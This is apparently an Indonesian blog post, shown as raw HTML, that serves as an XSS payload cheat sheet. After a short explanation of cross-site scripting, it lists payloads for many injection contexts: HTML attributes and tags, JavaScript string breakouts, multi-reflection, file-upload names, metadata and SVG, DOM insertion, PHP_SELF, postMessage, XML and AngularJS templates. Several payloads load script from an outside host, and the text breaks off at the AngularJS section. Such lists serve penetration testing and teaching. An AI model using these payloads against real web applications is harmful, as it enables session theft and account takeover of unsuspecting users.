href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhUknO6HWPTLP6BtQFAnWjXqa-8t4q05fmFfajcD7nPh0ThPz0cKy2MdtCLozihTC0kVZwWAYcVRGQ5eA5Mfi5pcX-GbKDbNRX65HHib5wxo2tDER88rYuPdHYHGBIwSJpxtIzVSkU9xpzL7UEJpGzAo-3lpGodhV3aas6aifXfMzgMdZgGPUnQLN/s1200/68747470733a2f2f64707376647637347577776f732e636c6f756466726f6e742e6e65742f737461746963732f696d672f6f67696d6167652f63726f73732d736974652d736372697074696e672d7873732e6a7067.jpeg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;630&quot; data-original-width=&quot;1200&quot; height=&quot;336&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRhUknO6HWPTLP6BtQFAnWjXqa-8t4q05fmFfajcD7nPh0ThPz0cKy2MdtCLozihTC0kVZwWAYcVRGQ5eA5Mfi5pcX-GbKDbNRX65HHib5wxo2tDER88rYuPdHYHGBIwSJpxtIzVSkU9xpzL7UEJpGzAo-3lpGodhV3aas6aifXfMzgMdZgGPUnQLN/w640-h336/68747470733a2f2f64707376647637347577776f732e636c6f756466726f6e742e6e65742f737461746963732f696d672f6f67696d6167652f63726f73732d736974652d736372697074696e672d7873732e6a7067.jpeg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Apa itu Cross Site Scripting (XSS)?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;XSS terjadi ketika penyerang mengelabui aplikasi web agar mengirimkan data dalam bentuk yang dapat dijalankan oleh browser pengguna. Paling umum, ini adalah kombinasi dari HTML dan XSS yang disediakan oleh penyerang, tetapi XSS juga dapat digunakan untuk mengirimkan unduhan, plugin, atau konten media yang berbahaya. Penyerang dapat mengelabui aplikasi web dengan cara ini ketika aplikasi web mengizinkan data dari sumber yang tidak tepercaya — seperti data yang dimasukkan dalam formulir oleh pengguna atau diteruskan ke titik akhir API oleh perangkat lunak klien — untuk ditampilkan kepada pengguna tanpa lolos dengan benar .&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Karena XSS dapat mengizinkan pengguna yang tidak tepercaya untuk mengeksekusi kode di browser pengguna tepercaya dan mengakses beberapa jenis data, seperti cookie sesi, kerentanan XSS memungkinkan penyerang mengambil data dari pengguna dan secara dinamis memasukkannya ke halaman web dan mengambil kendali situs atau aplikasi jika pengguna administratif atau istimewa menjadi sasaran.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Konten berbahaya yang dikirimkan melalui XSS dapat ditampilkan secara instan atau setiap kali halaman dimuat atau acara tertentu dilakukan. Serangan XSS bertujuan untuk menargetkan pengguna aplikasi web, dan mungkin sangat efektif karena muncul di dalam situs tepercaya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;Saya sangat berharap ini menjadi bahan konsultasi yang mudah diikuti untuk sebagian besar terkait XSS.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks HTML – Injeksi Tag Sederhana&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat masukan berada di dalam nilai atribut dari tag HTML atau di luar tag kecuali yang dijelaskan dalam kasus berikutnya.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;svg onload=alert(1)&amp;gt;
&quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks HTML – Dalam Injeksi Tag Blok&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input mendarat di dalam atau di antara pembukaan/penutupan tag berikut:&lt;/div&gt;&lt;div&gt;&amp;lt;title&amp;gt;&amp;lt;style&amp;gt;&amp;lt;script&amp;gt;&amp;lt;textarea&amp;gt;&amp;lt;noscript&amp;gt;&amp;lt;pre&amp;gt;&amp;lt;xmp&amp;gt; dan &amp;lt;iframe&amp;gt; (&amp;lt;/tag&amp;gt; adalah&lt;/div&gt;&lt;div&gt;sesuai).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;/tag&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
&quot;&amp;gt;&amp;lt;/tag&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks HTML – Injeksi Sebaris&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input berada di dalam nilai atribut dari tag HTML tetapi tag tersebut tidak dapat&lt;/div&gt;&lt;div&gt;diakhiri dengan tanda lebih besar dari (&amp;gt;).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&quot;onmouseover=alert(1)//
&quot;autofocus/onfocus=alert(1)//&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks HTML – Injeksi Sumber&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input mendarat sebagai nilai dari atribut tag HTML berikut: href, src, data atau&lt;/div&gt;&lt;div&gt;action (juga formaction). Untuk src dalam tag skrip, gunakan panggilan skrip eksternal (URL) atau&lt;/div&gt;&lt;div&gt;“data:,alert(1)”. Payload ke-2 di bawah peringatan di luar konteks target untuk browser Webkit.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;javascript:alert(1)
data:text/html,&amp;lt;svg onload=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks Javascript – Injeksi Kode&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input mendarat di blok skrip, di dalam nilai yang dibatasi string.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&#39;-alert(1)-&#39;
&#39;-alert(1)//&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks Javascript – Injeksi Kode dengan Escape Bypass&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input mendarat di blok skrip, di dalam nilai yang dibatasi string tetapi tanda kutip diloloskan oleh garis miring terbalik.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;\&#39;-alert(1)//&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks Javascript – Injeksi Kode di Blok Logis&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Gunakan muatan ke-1 atau ke-2 saat input mendarat di blok skrip, di dalam nilai yang dibatasi string, dan di dalam blok logis tunggal seperti fungsi atau kondisional (jika, lainnya, dll). Jika kutipan lolos dengan garis miring terbalik, gunakan muatan ke-3.&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&#39;}alert(1);{&#39;
&#39;}alert(1)%0A{&#39;
\&#39;}alert(1);{//&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Konteks Javascript – Injeksi Tag&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat input mendarat di mana saja di blok skrip.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;/script&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Advanced&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;div&gt;&lt;b&gt;Refleksi Multi – Refleksi Ganda (Masukan Tunggal)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk memanfaatkan beberapa pantulan pada halaman yang sama.&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&#39;onload=alert(1)&amp;gt;&amp;lt;svg/1=&#39;
&#39;&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;lt;script/1=&#39;
*/alert(1)&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;/*&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Refleksi Multi – Refleksi Tiga Kali (Masukan Tunggal)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk memanfaatkan beberapa pantulan pada halaman yang sama.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;*/alert(1)&quot;&amp;gt;&#39;onload=&quot;/*&amp;lt;svg/1=&#39;
`-alert(1)&quot;&amp;gt;&#39;onload=&quot;`&amp;lt;svg/1=&#39;
*/&amp;lt;/script&amp;gt;&#39;&amp;gt;alert(1)/*&amp;lt;script/1=&#39;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Refleksi Multi Input (Ganda &amp;amp; Tiga)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk memanfaatkan beberapa pantulan masukan pada halaman yang sama.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;p=&amp;lt;svg/1=&#39;&amp;amp;q=&#39;onload=alert(1)&amp;gt;
p=&amp;lt;svg 1=&#39;&amp;amp;q=&#39;onload=&#39;/*&amp;amp;r=*/alert(1)&#39;&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Pengunggahan File – Nama file&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat nama file yang diunggah tercermin di suatu tempat di halaman target.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;.gif&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Pengunggahan File – Metadata&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika metadata file yang diunggah tercermin di suatu tempat di halaman target. Itu menggunakan baris perintah exiftool dan bidang metadata apa pun dapat diatur.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;hacker@inthehouse:~$ exiftool -Artist=&#39;&quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;&#39; xss.jpeg&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Pengunggahan File – File SVG&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk membuat XSS yang tersimpan sesuai target saat mengunggah file gambar. Simpan konten di bawah sebagai &quot;xss.svg&quot;.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; onload=&quot;alert(1)&quot;/&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Sisipkan DOM&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk menguji XSS saat injeksi dimasukkan ke dalam DOM sebagai markup yang valid alih-alih tercermin dalam kode sumber. Ini berfungsi untuk kasus di mana tag skrip dan vektor lainnya tidak berfungsi.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;lt;iframe src=javascript:alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Sisipkan DOM – Permintaan Sumber Daya&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat kode javascript halaman menyisipkan ke halaman hasil permintaan ke URL&lt;/div&gt;&lt;div&gt;yang dikendalikan oleh penyerang (injeksi).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;data:text/html,&amp;lt;img src=1 onerror=alert(1)&amp;gt;
data:text/html,&amp;lt;iframe src=javascript:alert(1)&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi PHP_SELF&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika URL saat ini digunakan oleh kode PHP yang mendasari target sebagai nilai atribut dari&lt;/div&gt;&lt;div&gt;formulir HTML, misalnya. Menyuntikkan antara ekstensi php dan memulai bagian kueri (?) menggunakan garis miring (/).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;https://hackerinthehouse.in/xss.php/&quot;&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;?a=reader&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Skrip – Tanpa Penutupan&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika ada tag skrip penutup (&amp;lt;/script&amp;gt;) di suatu tempat di kode setelah refleksi.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;script src=data:,alert(1)&amp;gt;
&amp;lt;script src=//hackerinthehouse.in/1.js&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Javascript postMessage() Injeksi DOM (dengan Iframe)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan saat ada event listener “message” seperti di “window.addEventListener(&#39;message&#39;,&lt;/div&gt;&lt;div&gt;…)” dalam kode javascript tanpa memeriksa asal. Target harus bisa dibingkai (&lt;/div&gt;&lt;div&gt;header X-Frame Options sesuai konteks). Simpan sebagai file HTML (atau menggunakan data:teks/html) dengan menyediakan TARGET_URL dan INJEKSI (vektor atau payload XSS).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;iframe src=TARGET_URL onload=&quot;frames[0].postMessage(&#39;INJECTION&#39;,&#39;*&#39;)&quot;&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;XSS berbasis XML&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk menyuntikkan vektor XSS di halaman XML (tipe konten teks/xml atau aplikasi/xml).&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;&amp;lt;x:script xmlns:x=&quot;http://www.w3.org/1999/xhtml&quot;&amp;gt;alert(1)&amp;lt;/x:script&amp;gt;
&amp;lt;x:script xmlns:x=&quot;http://www.w3.org/1999/xhtml&quot; src=&quot;//hackerinthehouse.in/1.js&quot;/&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi Templat Sisi Klien&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan untuk menguji injeksi template sisi klien (berguna untuk injeksi AngularJS di bawah). Itu harus mengembalikan 1024 saat merender.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;{{32*32}}&lt;/pre&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;Injeksi AngularJS (v1.6 dan lebih tinggi)&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Gunakan ketika ada perpustakaan AngularJS dimuat di halaman, di dalam blok HTML dengan&lt;/div&gt;&lt;div&gt;direktif ng-app atau buat milik Anda sendiri.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;pre class=&quot;wp-block-preformatted&quot; style=&quot;-webkit-font-smoothing: antialiased; border-bottom: 1px solid transparent; border-image: initial; border-left: 3px solid var(--c-separator); border-right: 0px; border-top: 0px; box-sizing: inherit; font-family: Menlo, Monaco, Consolas, monospace; font-size: max(14px, 0.9em); letter-spacing: -0.08302px; margin: calc(var(--post-content-gaps) + 0.3em) auto; overflow-wrap: break-word; padding: 1.5em 1em; vertical-align: baseline; white-space: pre-wrap; word-break: break-all;&quot;&gt;{{constructor.constructor(&#39;alert(1)&#39;)()}}
